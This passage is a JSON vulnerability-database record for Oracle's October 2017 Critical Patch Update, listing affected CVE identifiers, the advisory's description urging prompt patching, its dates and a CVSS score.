"CVE-2017-3445", "CVE-2017-10373", "CVE-2016-1979", "CVE-2017-10363", "CVE-2017-10352", "CVE-2016-2381", "CVE-2014-8713", "CVE-2017-10279", "CVE-2015-7183", "CVE-2013-0255", "CVE-2017-10314", "CVE-2017-9805", "CVE-2015-1788", "CVE-2017-10055", "CVE-2014-0195", "CVE-2014-0198", "CVE-2017-10161", "CVE-2016-7052", "CVE-2015-0209", "CVE-2014-0063", "CVE-2016-1950", "CVE-2017-10333", "CVE-2015-0204", "CVE-2016-0706", "CVE-2013-0248", "CVE-2017-3733", "CVE-2017-5664", "CVE-2017-10312", "CVE-2017-10366", "CVE-2014-0060", "CVE-2017-10318", "CVE-2016-7429", "CVE-2016-1181", "CVE-2017-10268", "CVE-2017-10285", "CVE-2017-3446", "CVE-2017-10392", "CVE-2017-10413", "CVE-2016-9843", "CVE-2013-2566", "CVE-2016-8735", "CVE-2015-1790", "CVE-2017-10394", "CVE-2017-9788", "CVE-2017-10350", "CVE-2016-6305", "CVE-2016-6303", "CVE-2017-10275", "CVE-2017-10274", "CVE-2017-10190", "CVE-2013-1902", "CVE-2017-10315", "CVE-2015-0291", "CVE-2017-10317", "CVE-2017-10389", "CVE-2017-10385", "CVE-2017-10154", "CVE-2017-10395", "CVE-2017-3588", "CVE-2014-4345", "CVE-2017-10162", "CVE-2003-1418", "CVE-2016-2182", "CVE-2017-10358", "CVE-2017-10310", "CVE-2017-10077", "CVE-2017-10346", "CVE-2014-0062", "CVE-2017-10401", "CVE-2015-0287", "CVE-2017-7668", "CVE-2017-3444", "CVE-2017-10295", "CVE-2017-10393", "CVE-2017-10423", "CVE-2017-10280", "CVE-2017-5461", "CVE-2016-10165", "CVE-2014-0066", "CVE-2015-0289", "CVE-2016-9841", "CVE-2015-7940", "CVE-2017-3169", "CVE-2017-10065", "CVE-2016-5285", "CVE-2017-10368", "CVE-2015-0292", "CVE-2017-10375", "CVE-2017-10384", "CVE-2014-0107", "CVE-2017-10050", "CVE-2016-3506", "CVE-2017-10345", "CVE-2017-10303", "CVE-2017-10302", "CVE-2017-10259", "CVE-2017-10265", "CVE-2015-0290", "CVE-2017-3730", "CVE-2015-0205", "CVE-2017-10329", "CVE-2016-2179", "CVE-2017-10405", "CVE-2017-10277", "CVE-2016-6814", "CVE-2013-1900", "CVE-2015-1787", "CVE-2015-4852", "CVE-2014-0061", "CVE-2014-3569", "CVE-2017-10386", "CVE-2015-1791", "CVE-2017-10336", "CVE-2017-10335", 
"CVE-2016-7431", "CVE-2017-7679", "CVE-2014-0221", "CVE-2017-10331", "CVE-2017-10099"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 252 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2310031.1>).\n\nPlease note that on September 22, 2017, Oracle released [Security Alert for CVE-2017-9805](<http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html>). 
Customers of affected Oracle product(s) are strongly advised to apply the fixes that were announced in this Security Alert as well as those contained in this Critical Patch update\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2018-02-15T00:00:00", "published": "2017-10-17T00:00:00", "id": "ORACLE:CPUOCT2017-3236626", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2017", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}